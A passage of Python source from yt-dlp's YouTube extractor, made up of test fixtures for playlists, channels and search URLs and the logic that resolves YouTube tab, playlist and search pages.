'tags': [],
'view_count': int,
'channel_id': 'UCXw-G3eDE9trcvY2sBMM_aA',
'channel_url': 'https://www.youtube.com/c/InterstellarMovie',
'channel': 'Interstellar Movie',
'description': '',
'modified_date': r're:\d{8}',
},
'playlist_mincount': 21,
}, {
'note': 'Playlist with "show unavailable videos" button',
'url': 'https://www.youtube.com/playlist?list=UUTYLiWFZy8xtPwxFwX9rV7Q',
'info_dict': {
'title': 'Uploads from Phim Siêu Nhân Nhật Bản',
'id': 'UUTYLiWFZy8xtPwxFwX9rV7Q',
'uploader': 'Phim Siêu Nhân Nhật Bản',
'uploader_id': 'UCTYLiWFZy8xtPwxFwX9rV7Q',
'view_count': int,
'channel': 'Phim Siêu Nhân Nhật Bản',
'tags': [],
'uploader_url': 'https://www.youtube.com/channel/UCTYLiWFZy8xtPwxFwX9rV7Q',
'description': '',
'channel_url': 'https://www.youtube.com/channel/UCTYLiWFZy8xtPwxFwX9rV7Q',
'channel_id': 'UCTYLiWFZy8xtPwxFwX9rV7Q',
'modified_date': r're:\d{8}',
},
'playlist_mincount': 200,
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'note': 'Playlist with unavailable videos in page 7',
'url': 'https://www.youtube.com/playlist?list=UU8l9frL61Yl5KFOl87nIm2w',
'info_dict': {
'title': 'Uploads from BlankTV',
'id': 'UU8l9frL61Yl5KFOl87nIm2w',
'uploader': 'BlankTV',
'uploader_id': 'UC8l9frL61Yl5KFOl87nIm2w',
'channel': 'BlankTV',
'channel_url': 'https://www.youtube.com/c/blanktv',
'channel_id': 'UC8l9frL61Yl5KFOl87nIm2w',
'view_count': int,
'tags': [],
'uploader_url': 'https://www.youtube.com/c/blanktv',
'modified_date': r're:\d{8}',
'description': '',
},
'playlist_mincount': 1000,
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'note': 'https://github.com/ytdl-org/youtube-dl/issues/21844',
'url': 'https://www.youtube.com/playlist?list=PLzH6n4zXuckpfMu_4Ff8E7Z1behQks5ba',
'info_dict': {
'title': 'Data Analysis with Dr Mike Pound',
'id': 'PLzH6n4zXuckpfMu_4Ff8E7Z1behQks5ba',
'uploader_id': 'UC9-y-6csu5WGm29I7JiwpnA',
'uploader': 'Computerphile',
'description': 'md5:7f567c574d13d3f8c0954d9ffee4e487',
'uploader_url': 'https://www.youtube.com/user/Computerphile',
'tags': [],
'view_count': int,
'channel_id': 'UC9-y-6csu5WGm29I7JiwpnA',
'channel_url': 'https://www.youtube.com/user/Computerphile',
'channel': 'Computerphile',
},
'playlist_mincount': 11,
}, {
'url': 'https://invidio.us/playlist?list=PL4lCao7KL_QFVb7Iudeipvc2BCavECqzc',
'only_matching': True,
}, {
'note': 'Playlist URL that does not actually serve a playlist',
'url': 'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4',
'info_dict': {
'id': 'FqZTN594JQw',
'ext': 'webm',
'title': "Smiley's People 01 detective, Adventure Series, Action",
'uploader': 'STREEM',
'uploader_id': 'UCyPhqAZgwYWZfxElWVbVJng',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCyPhqAZgwYWZfxElWVbVJng',
'upload_date': '20150526',
'license': 'Standard YouTube License',
'description': 'md5:507cdcb5a49ac0da37a920ece610be80',
'categories': ['People & Blogs'],
'tags': list,
'view_count': int,
'like_count': int,
},
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
'add_ie': [YoutubeIE.ie_key()],
}, {
'url': 'https://www.youtubekids.com/watch?v=Agk7R8I8o5U&list=PUZ6jURNr1WQZCNHF0ao-c0g',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?v=MuAGGZNfUkU&list=RDMM',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/channel/UCoMdktPbSTixAyNGwb-UYkQ/live',
'info_dict': {
'id': 'GgL890LIznQ', # This will keep changing
'ext': 'mp4',
'title': str,
'uploader': 'Sky News',
'uploader_id': 'skynews',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/skynews',
'upload_date': r're:\d{8}',
'description': str,
'categories': ['News & Politics'],
'tags': list,
'like_count': int,
'release_timestamp': 1642502819,
'channel': 'Sky News',
'channel_id': 'UCoMdktPbSTixAyNGwb-UYkQ',
'age_limit': 0,
'view_count': int,
'thumbnail': 'https://i.ytimg.com/vi/GgL890LIznQ/maxresdefault_live.jpg',
'playable_in_embed': True,
'release_date': '20220118',
'availability': 'public',
'live_status': 'is_live',
'channel_url': 'https://www.youtube.com/channel/UCoMdktPbSTixAyNGwb-UYkQ',
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
'expected_warnings': ['Ignoring subtitle tracks found in '],
}, {
'url': 'https://www.youtube.com/user/TheYoungTurks/live',
'info_dict': {
'id': 'a48o2S1cPoo',
'ext': 'mp4',
'title': 'The Young Turks - Live Main Show',
'uploader': 'The Young Turks',
'uploader_id': 'TheYoungTurks',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheYoungTurks',
'upload_date': '20150715',
'license': 'Standard YouTube License',
'description': 'md5:438179573adcdff3c97ebb1ee632b891',
'categories': ['News & Politics'],
'tags': ['Cenk Uygur (TV Program Creator)', 'The Young Turks (Award-Winning Work)', 'Talk Show (TV Genre)'],
'like_count': int,
},
'params': {
'skip_download': True,
},
'only_matching': True,
}, {
'url': 'https://www.youtube.com/channel/UC1yBKRuGpC1tSM73A0ZjYjQ/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/c/CommanderVideoHq/live',
'only_matching': True,
}, {
'note': 'A channel that is not live. Should raise error',
'url': 'https://www.youtube.com/user/numberphile/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/feed/trending',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/feed/library',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/feed/history',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/feed/subscriptions',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/feed/watch_later',
'only_matching': True,
}, {
'note': 'Recommended - redirects to home page.',
'url': 'https://www.youtube.com/feed/recommended',
'only_matching': True,
}, {
'note': 'inline playlist with not always working continuations',
'url': 'https://www.youtube.com/watch?v=UC6u0Tct-Fo&list=PL36D642111D65BE7C',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/course',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/zsecurity',
'only_matching': True,
}, {
'url': 'http://www.youtube.com/NASAgovVideo/videos',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/TheYoungTurks/live',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/hashtag/cctv9',
'info_dict': {
'id': 'cctv9',
'title': '#cctv9',
'tags': [],
},
'playlist_mincount': 350,
}, {
'url': 'https://www.youtube.com/watch?list=PLW4dVinRY435CBE_JD3t-0SRXKfnZHS1P&feature=youtu.be&v=M9cJMXmQ_ZU',
'only_matching': True,
}, {
'note': 'Requires Premium: should request additional YTM-info webpage (and have format 141) for videos in playlist',
'url': 'https://music.youtube.com/playlist?list=PLRBp0Fe2GpgmgoscNFLxNyBVSFVdYmFkq',
'only_matching': True
}, {
'note': '/browse/ should redirect to /channel/',
'url': 'https://music.youtube.com/browse/UC1a8OFewdjuLq6KlF8M_8Ng',
'only_matching': True
}, {
'note': 'VLPL, should redirect to playlist?list=PL...',
'url': 'https://music.youtube.com/browse/VLPLRBp0Fe2GpgmgoscNFLxNyBVSFVdYmFkq',
'info_dict': {
'id': 'PLRBp0Fe2GpgmgoscNFLxNyBVSFVdYmFkq',
'uploader': 'NoCopyrightSounds',
'description': 'Providing you with copyright free / safe music for gaming, live streaming, studying and more!',
'uploader_id': 'UC_aEa8K-EOJ3D6gOs7HcyNg',
'title': 'NCS Releases',
'uploader_url': 'https://www.youtube.com/c/NoCopyrightSounds',
'channel_url': 'https://www.youtube.com/c/NoCopyrightSounds',
'modified_date': r're:\d{8}',
'view_count': int,
'channel_id': 'UC_aEa8K-EOJ3D6gOs7HcyNg',
'tags': [],
'channel': 'NoCopyrightSounds',
},
'playlist_mincount': 166,
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'note': 'Topic, should redirect to playlist?list=UU...',
'url': 'https://music.youtube.com/browse/UC9ALqqC4aIeG5iDs7i90Bfw',
'info_dict': {
'id': 'UU9ALqqC4aIeG5iDs7i90Bfw',
'uploader_id': 'UC9ALqqC4aIeG5iDs7i90Bfw',
'title': 'Uploads from Royalty Free Music - Topic',
'uploader': 'Royalty Free Music - Topic',
'tags': [],
'channel_id': 'UC9ALqqC4aIeG5iDs7i90Bfw',
'channel': 'Royalty Free Music - Topic',
'view_count': int,
'channel_url': 'https://www.youtube.com/channel/UC9ALqqC4aIeG5iDs7i90Bfw',
'channel_url': 'https://www.youtube.com/channel/UC9ALqqC4aIeG5iDs7i90Bfw',
'modified_date': r're:\d{8}',
'uploader_url': 'https://www.youtube.com/channel/UC9ALqqC4aIeG5iDs7i90Bfw',
'description': '',
},
'expected_warnings': [
'The URL does not have a videos tab',
r'[Uu]navailable videos (are|will be) hidden',
],
'playlist_mincount': 101,
}, {
'note': 'Topic without a UU playlist',
'url': 'https://www.youtube.com/channel/UCtFRv9O2AHqOZjjynzrv-xg',
'info_dict': {
'id': 'UCtFRv9O2AHqOZjjynzrv-xg',
'title': 'UCtFRv9O2AHqOZjjynzrv-xg',
'tags': [],
},
'expected_warnings': [
'the playlist redirect gave error',
],
'playlist_mincount': 9,
}, {
'note': 'Youtube music Album',
'url': 'https://music.youtube.com/browse/MPREb_gTAcphH99wE',
'info_dict': {
'id': 'OLAK5uy_l1m0thk3g31NmIIz_vMIbWtyv7eZixlH0',
'title': 'Album - Royalty Free Music Library V2 (50 Songs)',
'tags': [],
'view_count': int,
'description': '',
'availability': 'unlisted',
'modified_date': r're:\d{8}',
},
'playlist_count': 50,
}, {
'note': 'unlisted single video playlist',
'url': 'https://www.youtube.com/playlist?list=PLwL24UFy54GrB3s2KMMfjZscDi1x5Dajf',
'info_dict': {
'uploader_id': 'UC9zHu_mHU96r19o-wV5Qs1Q',
'uploader': 'colethedj',
'id': 'PLwL24UFy54GrB3s2KMMfjZscDi1x5Dajf',
'title': 'yt-dlp unlisted playlist test',
'availability': 'unlisted',
'tags': [],
'modified_date': '20211208',
'channel': 'colethedj',
'view_count': int,
'description': '',
'uploader_url': 'https://www.youtube.com/channel/UC9zHu_mHU96r19o-wV5Qs1Q',
'channel_id': 'UC9zHu_mHU96r19o-wV5Qs1Q',
'channel_url': 'https://www.youtube.com/channel/UC9zHu_mHU96r19o-wV5Qs1Q',
},
'playlist_count': 1,
}, {
'note': 'API Fallback: Recommended - redirects to home page. Requires visitorData',
'url': 'https://www.youtube.com/feed/recommended',
'info_dict': {
'id': 'recommended',
'title': 'recommended',
'tags': [],
},
'playlist_mincount': 50,
'params': {
'skip_download': True,
'extractor_args': {'youtubetab': {'skip': ['webpage']}}
},
}, {
'note': 'API Fallback: /videos tab, sorted by oldest first',
'url': 'https://www.youtube.com/user/theCodyReeder/videos?view=0&sort=da&flow=grid',
'info_dict': {
'id': 'UCu6mSoMNzHQiBIOCkHUa2Aw',
'title': 'Cody\'sLab - Videos',
'description': 'md5:d083b7c2f0c67ee7a6c74c3e9b4243fa',
'uploader': 'Cody\'sLab',
'uploader_id': 'UCu6mSoMNzHQiBIOCkHUa2Aw',
'channel': 'Cody\'sLab',
'channel_id': 'UCu6mSoMNzHQiBIOCkHUa2Aw',
'tags': [],
'channel_url': 'https://www.youtube.com/channel/UCu6mSoMNzHQiBIOCkHUa2Aw',
'uploader_url': 'https://www.youtube.com/channel/UCu6mSoMNzHQiBIOCkHUa2Aw',
'channel_follower_count': int
},
'playlist_mincount': 650,
'params': {
'skip_download': True,
'extractor_args': {'youtubetab': {'skip': ['webpage']}}
},
}, {
'note': 'API Fallback: Topic, should redirect to playlist?list=UU...',
'url': 'https://music.youtube.com/browse/UC9ALqqC4aIeG5iDs7i90Bfw',
'info_dict': {
'id': 'UU9ALqqC4aIeG5iDs7i90Bfw',
'uploader_id': 'UC9ALqqC4aIeG5iDs7i90Bfw',
'title': 'Uploads from Royalty Free Music - Topic',
'uploader': 'Royalty Free Music - Topic',
'modified_date': r're:\d{8}',
'channel_id': 'UC9ALqqC4aIeG5iDs7i90Bfw',
'description': '',
'channel_url': 'https://www.youtube.com/channel/UC9ALqqC4aIeG5iDs7i90Bfw',
'tags': [],
'channel': 'Royalty Free Music - Topic',
'view_count': int,
'uploader_url': 'https://www.youtube.com/channel/UC9ALqqC4aIeG5iDs7i90Bfw',
},
'expected_warnings': [
'does not have a videos tab',
r'[Uu]navailable videos (are|will be) hidden',
],
'playlist_mincount': 101,
'params': {
'skip_download': True,
'extractor_args': {'youtubetab': {'skip': ['webpage']}}
},
}, {
'note': 'non-standard redirect to regional channel',
'url': 'https://www.youtube.com/channel/UCwVVpHQ2Cs9iGJfpdFngePQ',
'only_matching': True
}, {
'note': 'collaborative playlist (uploader name in the form "by <uploader> and x other(s)")',
'url': 'https://www.youtube.com/playlist?list=PLx-_-Kk4c89oOHEDQAojOXzEzemXxoqx6',
'info_dict': {
'id': 'PLx-_-Kk4c89oOHEDQAojOXzEzemXxoqx6',
'modified_date': '20220407',
'channel_url': 'https://www.youtube.com/channel/UCKcqXmCcyqnhgpA5P0oHH_Q',
'tags': [],
'uploader_id': 'UCKcqXmCcyqnhgpA5P0oHH_Q',
'uploader': 'pukkandan',
'availability': 'unlisted',
'channel_id': 'UCKcqXmCcyqnhgpA5P0oHH_Q',
'channel': 'pukkandan',
'description': 'Test for collaborative playlist',
'title': 'yt-dlp test - collaborative playlist',
'uploader_url': 'https://www.youtube.com/channel/UCKcqXmCcyqnhgpA5P0oHH_Q',
},
'playlist_mincount': 2
}]
@classmethod
def suitable(cls, url):
return False if YoutubeIE.suitable(url) else super(
YoutubeTabIE, cls).suitable(url)
_URL_RE = re.compile(rf'(?P<pre>{_VALID_URL})(?(not_channel)|(?P<tab>/\w+))?(?P<post>.*)$')
@YoutubeTabBaseInfoExtractor.passthrough_smuggled_data
def _real_extract(self, url, smuggled_data):
item_id = self._match_id(url)
url = compat_urlparse.urlunparse(
compat_urlparse.urlparse(url)._replace(netloc='www.youtube.com'))
compat_opts = self.get_param('compat_opts', [])
def get_mobj(url):
mobj = self._URL_RE.match(url).groupdict()
mobj.update((k, '') for k, v in mobj.items() if v is None)
return mobj
mobj, redirect_warning = get_mobj(url), None
# Youtube returns incomplete data if tabname is not lower case
pre, tab, post, is_channel = mobj['pre'], mobj['tab'].lower(), mobj['post'], not mobj['not_channel']
if is_channel:
if smuggled_data.get('is_music_url'):
if item_id[:2] == 'VL': # Youtube music VL channels have an equivalent playlist
item_id = item_id[2:]
pre, tab, post, is_channel = f'https://www.youtube.com/playlist?list={item_id}', '', '', False
elif item_id[:2] == 'MP': # Resolve albums (/[channel/browse]/MP...) to their equivalent playlist
mdata = self._extract_tab_endpoint(
f'https://music.youtube.com/channel/{item_id}', item_id, default_client='web_music')
murl = traverse_obj(mdata, ('microformat', 'microformatDataRenderer', 'urlCanonical'),
get_all=False, expected_type=compat_str)
if not murl:
raise ExtractorError('Failed to resolve album to playlist')
return self.url_result(murl, ie=YoutubeTabIE.ie_key())
elif mobj['channel_type'] == 'browse': # Youtube music /browse/ should be changed to /channel/
pre = f'https://www.youtube.com/channel/{item_id}'
original_tab_name = tab
if is_channel and not tab and 'no-youtube-channel-redirect' not in compat_opts:
# Home URLs should redirect to /videos/
redirect_warning = ('A channel/user page was given. All the channel\'s videos will be downloaded. '
'To download only the videos in the home page, add a "/featured" to the URL')
tab = '/videos'
url = ''.join((pre, tab, post))
mobj = get_mobj(url)
# Handle both video/playlist URLs
qs = parse_qs(url)
video_id, playlist_id = [qs.get(key, [None])[0] for key in ('v', 'list')]
if not video_id and mobj['not_channel'].startswith('watch'):
if not playlist_id:
# If there is neither video or playlist ids, youtube redirects to home page, which is undesirable
raise ExtractorError('Unable to recognize tab page')
# Common mistake: https://www.youtube.com/watch?list=playlist_id
self.report_warning(f'A video URL was given without video ID. Trying to download playlist {playlist_id}')
url = f'https://www.youtube.com/playlist?list={playlist_id}'
mobj = get_mobj(url)
if video_id and playlist_id:
if self.get_param('noplaylist'):
self.to_screen(f'Downloading just video {video_id} because of --no-playlist')
return self.url_result(f'https://www.youtube.com/watch?v={video_id}',
ie=YoutubeIE.ie_key(), video_id=video_id)
self.to_screen(f'Downloading playlist {playlist_id}; add --no-playlist to just download video {video_id}')
data, ytcfg = self._extract_data(url, item_id)
# YouTube may provide a non-standard redirect to the regional channel
# See: https://github.com/yt-dlp/yt-dlp/issues/2694
redirect_url = traverse_obj(
data, ('onResponseReceivedActions', ..., 'navigateAction', 'endpoint', 'commandMetadata', 'webCommandMetadata', 'url'), get_all=False)
if redirect_url and 'no-youtube-channel-redirect' not in compat_opts:
redirect_url = ''.join((
urljoin('https://www.youtube.com', redirect_url), mobj['tab'], mobj['post']))
self.to_screen(f'This playlist is likely not available in your region. Following redirect to regional playlist {redirect_url}')
return self.url_result(redirect_url, ie=YoutubeTabIE.ie_key())
tabs = traverse_obj(data, ('contents', 'twoColumnBrowseResultsRenderer', 'tabs'), expected_type=list)
if tabs:
selected_tab = self._extract_selected_tab(tabs)
selected_tab_name = selected_tab.get('title', '').lower()
if selected_tab_name == 'home':
selected_tab_name = 'featured'
requested_tab_name = mobj['tab'][1:]
if 'no-youtube-channel-redirect' not in compat_opts:
if requested_tab_name == 'live':
# Live tab should have redirected to the video
raise ExtractorError('The channel is not currently live', expected=True)
if requested_tab_name not in ('', selected_tab_name):
redirect_warning = f'The channel does not have a {requested_tab_name} tab'
if not original_tab_name:
if item_id[:2] == 'UC':
# Topic channels don't have /videos. Use the equivalent playlist instead
pl_id = f'UU{item_id[2:]}'
pl_url = f'https://www.youtube.com/playlist?list={pl_id}'
try:
data, ytcfg = self._extract_data(pl_url, pl_id, ytcfg=ytcfg, fatal=True, webpage_fatal=True)
except ExtractorError:
redirect_warning += ' and the playlist redirect gave error'
else:
item_id, url, selected_tab_name = pl_id, pl_url, requested_tab_name
redirect_warning += f'. Redirecting to playlist {pl_id} instead'
if selected_tab_name and selected_tab_name != requested_tab_name:
redirect_warning += f'. {selected_tab_name} tab is being downloaded instead'
else:
raise ExtractorError(redirect_warning, expected=True)
if redirect_warning:
self.to_screen(redirect_warning)
self.write_debug(f'Final URL: {url}')
# YouTube sometimes provides a button to reload playlist with unavailable videos.
if 'no-youtube-unavailable-videos' not in compat_opts:
data = self._reload_with_unavailable_videos(item_id, data, ytcfg) or data
self._extract_and_report_alerts(data, only_once=True)
tabs = traverse_obj(data, ('contents', 'twoColumnBrowseResultsRenderer', 'tabs'), expected_type=list)
if tabs:
return self._extract_from_tabs(item_id, ytcfg, data, tabs)
playlist = traverse_obj(
data, ('contents', 'twoColumnWatchNextResults', 'playlist', 'playlist'), expected_type=dict)
if playlist:
return self._extract_from_playlist(item_id, url, data, playlist, ytcfg)
video_id = traverse_obj(
data, ('currentVideoEndpoint', 'watchEndpoint', 'videoId'), expected_type=str) or video_id
if video_id:
if mobj['tab'] != '/live': # live tab is expected to redirect to video
self.report_warning(f'Unable to recognize playlist. Downloading just video {video_id}')
return self.url_result(f'https://www.youtube.com/watch?v={video_id}',
ie=YoutubeIE.ie_key(), video_id=video_id)
raise ExtractorError('Unable to recognize tab page')
class YoutubePlaylistIE(InfoExtractor):
IE_DESC = 'YouTube playlists'
_VALID_URL = r'''(?x)(?:
(?:https?://)?
(?:\w+\.)?
(?:
(?:
youtube(?:kids)?\.com|
%(invidious)s
)
/.*?\?.*?\blist=
)?
(?P<id>%(playlist_id)s)
)''' % {
'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE,
'invidious': '|'.join(YoutubeBaseInfoExtractor._INVIDIOUS_SITES),
}
IE_NAME = 'youtube:playlist'
_TESTS = [{
'note': 'issue #673',
'url': 'PLBB231211A4F62143',
'info_dict': {
'title': '[OLD]Team Fortress 2 (Class-based LP)',
'id': 'PLBB231211A4F62143',
'uploader': 'Wickman',
'uploader_id': 'UCKSpbfbl5kRQpTdL7kMc-1Q',
'description': 'md5:8fa6f52abb47a9552002fa3ddfc57fc2',
'view_count': int,
'uploader_url': 'https://www.youtube.com/user/Wickydoo',
'modified_date': r're:\d{8}',
'channel_id': 'UCKSpbfbl5kRQpTdL7kMc-1Q',
'channel': 'Wickman',
'tags': [],
'channel_url': 'https://www.youtube.com/user/Wickydoo',
},
'playlist_mincount': 29,
}, {
'url': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
'info_dict': {
'title': 'YDL_safe_search',
'id': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
},
'playlist_count': 2,
'skip': 'This playlist is private',
}, {
'note': 'embedded',
'url': 'https://www.youtube.com/embed/videoseries?list=PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
'playlist_count': 4,
'info_dict': {
'title': 'JODA15',
'id': 'PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
'uploader': 'milan',
'uploader_id': 'UCEI1-PVPcYXjB73Hfelbmaw',
'description': '',
'channel_url': 'https://www.youtube.com/channel/UCEI1-PVPcYXjB73Hfelbmaw',
'tags': [],
'modified_date': '20140919',
'view_count': int,
'channel': 'milan',
'channel_id': 'UCEI1-PVPcYXjB73Hfelbmaw',
'uploader_url': 'https://www.youtube.com/channel/UCEI1-PVPcYXjB73Hfelbmaw',
},
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'url': 'http://www.youtube.com/embed/_xDOZElKyNU?list=PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
'playlist_mincount': 654,
'info_dict': {
'title': '2018 Chinese New Singles (11/6 updated)',
'id': 'PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
'uploader': 'LBK',
'uploader_id': 'UC21nz3_MesPLqtDqwdvnoxA',
'description': 'md5:da521864744d60a198e3a88af4db0d9d',
'channel': 'LBK',
'view_count': int,
'channel_url': 'https://www.youtube.com/c/愛低音的國王',
'tags': [],
'uploader_url': 'https://www.youtube.com/c/愛低音的國王',
'channel_id': 'UC21nz3_MesPLqtDqwdvnoxA',
'modified_date': r're:\d{8}',
},
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'url': 'TLGGrESM50VT6acwMjAyMjAxNw',
'only_matching': True,
}, {
# music album playlist
'url': 'OLAK5uy_m4xAFdmMC5rX3Ji3g93pQe3hqLZw_9LhM',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
if YoutubeTabIE.suitable(url):
return False
from ..utils import parse_qs
qs = parse_qs(url)
if qs.get('v', [None])[0]:
return False
return super(YoutubePlaylistIE, cls).suitable(url)
def _real_extract(self, url):
playlist_id = self._match_id(url)
is_music_url = YoutubeBaseInfoExtractor.is_music_url(url)
url = update_url_query(
'https://www.youtube.com/playlist',
parse_qs(url) or {'list': playlist_id})
if is_music_url:
url = smuggle_url(url, {'is_music_url': True})
return self.url_result(url, ie=YoutubeTabIE.ie_key(), video_id=playlist_id)
class YoutubeYtBeIE(InfoExtractor):
IE_DESC = 'youtu.be'
_VALID_URL = r'https?://youtu\.be/(?P<id>[0-9A-Za-z_-]{11})/*?.*?\blist=(?P<playlist_id>%(playlist_id)s)' % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_TESTS = [{
'url': 'https://youtu.be/yeWKywCrFtk?list=PL2qgrgXsNUG5ig9cat4ohreBjYLAPC0J5',
'info_dict': {
'id': 'yeWKywCrFtk',
'ext': 'mp4',
'title': 'Small Scale Baler and Braiding Rugs',
'uploader': 'Backus-Page House Museum',
'uploader_id': 'backuspagemuseum',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/backuspagemuseum',
'upload_date': '20161008',
'description': 'md5:800c0c78d5eb128500bffd4f0b4f2e8a',
'categories': ['Nonprofits & Activism'],
'tags': list,
'like_count': int,
'age_limit': 0,
'playable_in_embed': True,
'thumbnail': 'https://i.ytimg.com/vi_webp/yeWKywCrFtk/maxresdefault.webp',
'channel': 'Backus-Page House Museum',
'channel_id': 'UCEfMCQ9bs3tjvjy1s451zaw',
'live_status': 'not_live',
'view_count': int,
'channel_url': 'https://www.youtube.com/channel/UCEfMCQ9bs3tjvjy1s451zaw',
'availability': 'public',
'duration': 59,
},
'params': {
'noplaylist': True,
'skip_download': True,
},
}, {
'url': 'https://youtu.be/uWyaPkt-VOI?list=PL9D9FC436B881BA21',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = self._match_valid_url(url)
video_id = mobj.group('id')
playlist_id = mobj.group('playlist_id')
return self.url_result(
update_url_query('https://www.youtube.com/watch', {
'v': video_id,
'list': playlist_id,
'feature': 'youtu.be',
}), ie=YoutubeTabIE.ie_key(), video_id=playlist_id)
class YoutubeLivestreamEmbedIE(InfoExtractor):
IE_DESC = 'YouTube livestream embeds'
_VALID_URL = r'https?://(?:\w+\.)?youtube\.com/embed/live_stream/?\?(?:[^#]+&)?channel=(?P<id>[^&#]+)'
_TESTS = [{
'url': 'https://www.youtube.com/embed/live_stream?channel=UC2_KI6RB__jGdlnK6dvFEZA',
'only_matching': True,
}]
def _real_extract(self, url):
channel_id = self._match_id(url)
return self.url_result(
f'https://www.youtube.com/channel/{channel_id}/live',
ie=YoutubeTabIE.ie_key(), video_id=channel_id)
class YoutubeYtUserIE(InfoExtractor):
IE_DESC = 'YouTube user videos; "ytuser:" prefix'
IE_NAME = 'youtube:user'
_VALID_URL = r'ytuser:(?P<id>.+)'
_TESTS = [{
'url': 'ytuser:phihag',
'only_matching': True,
}]
def _real_extract(self, url):
user_id = self._match_id(url)
return self.url_result(
'https://www.youtube.com/user/%s/videos' % user_id,
ie=YoutubeTabIE.ie_key(), video_id=user_id)
class YoutubeFavouritesIE(YoutubeBaseInfoExtractor):
IE_NAME = 'youtube:favorites'
IE_DESC = 'YouTube liked videos; ":ytfav" keyword (requires cookies)'
_VALID_URL = r':ytfav(?:ou?rite)?s?'
_LOGIN_REQUIRED = True
_TESTS = [{
'url': ':ytfav',
'only_matching': True,
}, {
'url': ':ytfavorites',
'only_matching': True,
}]
def _real_extract(self, url):
return self.url_result(
'https://www.youtube.com/playlist?list=LL',
ie=YoutubeTabIE.ie_key())
class YoutubeSearchIE(YoutubeTabBaseInfoExtractor, SearchInfoExtractor):
IE_DESC = 'YouTube search'
IE_NAME = 'youtube:search'
_SEARCH_KEY = 'ytsearch'
_SEARCH_PARAMS = 'EgIQAQ%3D%3D' # Videos only
_TESTS = [{
'url': 'ytsearch5:youtube-dl test video',
'playlist_count': 5,
'info_dict': {
'id': 'youtube-dl test video',
'title': 'youtube-dl test video',
}
}]
class YoutubeSearchDateIE(YoutubeTabBaseInfoExtractor, SearchInfoExtractor):
IE_NAME = YoutubeSearchIE.IE_NAME + ':date'
_SEARCH_KEY = 'ytsearchdate'
IE_DESC = 'YouTube search, newest videos first'
_SEARCH_PARAMS = 'CAISAhAB' # Videos only, sorted by date
_TESTS = [{
'url': 'ytsearchdate5:youtube-dl test video',
'playlist_count': 5,
'info_dict': {
'id': 'youtube-dl test video',
'title': 'youtube-dl test video',
}
}]
class YoutubeSearchURLIE(YoutubeTabBaseInfoExtractor):
IE_DESC = 'YouTube search URLs with sorting and filter support'
IE_NAME = YoutubeSearchIE.IE_NAME + '_url'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/(?:results|search)\?([^#]+&)?(?:search_query|q)=(?:[^&]+)(?:[&#]|$)'
_TESTS = [{
'url': 'https://www.youtube.com/results?baz=bar&search_query=youtube-dl+test+video&filters=video&lclk=video',
'playlist_mincount': 5,
'info_dict': {
'id': 'youtube-dl test video',
'title': 'youtube-dl test video',
}
}, {
'url': 'https://www.youtube.com/results?search_query=python&sp=EgIQAg%253D%253D',
'playlist_mincount': 5,
'info_dict': {
'id': 'python',
'title': 'python',
}
}, {
'url': 'https://www.youtube.com/results?search_query=%23cats',
'playlist_mincount': 1,
'info_dict': {
'id': '#cats',
'title': '#cats',
'entries': [{
'url': r're:https://(www\.)?youtube\.com/hashtag/cats',
'title': '#cats',
}],
},
}, {
'url': 'https://www.youtube.com/results?q=test&sp=EgQIBBgB',
'only_matching': True,
}]
def _real_extract(self, url):
qs = parse_qs(url)
query = (qs.get('search_query') or qs.get('q'))[0]
return self.playlist_result(self._search_results(query, qs.get('sp', (None,))[0]), query, query)
class YoutubeMusicSearchURLIE(YoutubeTabBaseInfoExtractor):
IE_DESC = 'YouTube music search URLs with selectable sections (Eg: #songs)'
IE_NAME = 'youtube:music:search_url'
_VALID_URL = r'https?://music\.youtube\.com/search\?([^#]+&)?(?:search_query|q)=(?:[^&]+)(?:[&#]|$)'
_TESTS = [{
'url': 'https://music.youtube.com/search?q=royalty+free+music',
'playlist_count': 16,
'info_dict': {
'id': 'royalty free music',
'title': 'royalty free music',
}
}, {
'url': 'https://music.youtube.com/search?q=royalty+free+music&sp=EgWKAQIIAWoKEAoQAxAEEAkQBQ%3D%3D',
'playlist_mincount': 30,
'info_dict': {
'id': 'royalty free music - songs',
'title': 'royalty free music - songs',
},
'params': {'extract_flat': 'in_playlist'}
}, {
'url': 'https://music.youtube.com/search?q=royalty+free+music#community+playlists',
'playlist_mincount': 30,
'info_dict': {
'id': 'royalty free music - community playlists',
'title': 'royalty free music - community playlists',
},
'params': {'extract_flat': 'in_playlist'}
}]
_SECTIONS = {
'albums': 'EgWKAQIYAWoKEAoQAxAEEAkQBQ==',
'artists': 'EgWKAQIgAWoKEAoQAxAEEAkQBQ==',
